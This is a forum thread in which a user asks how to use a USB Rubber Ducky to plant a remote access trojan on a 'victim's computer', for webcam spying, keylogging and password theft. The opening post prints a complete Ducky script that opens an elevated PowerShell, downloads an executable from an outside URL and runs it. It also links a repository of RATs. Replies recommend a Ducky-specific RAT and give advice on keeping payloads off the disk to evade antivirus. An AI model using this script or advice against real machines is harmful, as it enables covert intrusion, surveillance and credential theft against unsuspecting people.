Mike Jamieson Posted March 15, 2017 Share Posted March 15, 2017 Hey Guys, I was wondering if anyone has used the usb rubber ducky to execute a RAT on a victim's computer. I found the script, Payload Windows 10 : Download and execute file with Powershell, on the ducky github and thought it would be a great means to injecting a RAT on victim's computer. Does anyone have experience with this or could share some RAT's that they've used in the past? In particular, RAT's that are able to view webcam, keylog, obtain passwords, transfer files and provide control over the infected machine, etc. Here is the ducky script to Payload Windows 10 : Download and execute file with Powershell: REM Windows 10: Poweshell administrator download and execute file REM Author: Judge2020 REM author website: Judge2020.com REM REM start of script REM REM let the HID enumerate DELAY 1000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1000 ALT y DELAY 200 STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; I found this repository of various RAT's on github and again was wondering if anyone has any experience with any of them? https://github.com/malwares/Remote-Access-Trojan Quote Link to comment Share on other sites More sharing options...
CztHrm Posted May 4, 2017 Share Posted May 4, 2017 There is a guy on HF who created a RAT specifically for the rubber ducky. I'd check him out if that's what you're into. You can screen view, edit stuff etc.I hear it's rather difficult to deploy though. Quote Link to comment Share on other sites More sharing options...
untitled Posted May 6, 2017 Share Posted May 6, 2017 Try this out: duckyRAT (I made it :D) Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted May 9, 2017 Share Posted May 9, 2017 I tend to launch agents for pentest frameworks as my RATs for ducky and Bash Bunny stuff. Empire is one of choice I use a lot for Windows environments. I tend to stay away from dropping binaries to the drive. Even if I have to download a pre-stage agent I have to build to handle getting the binary as base64 to decode and execute/inject, I try not to put it on the victim's drive to avoid AV. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.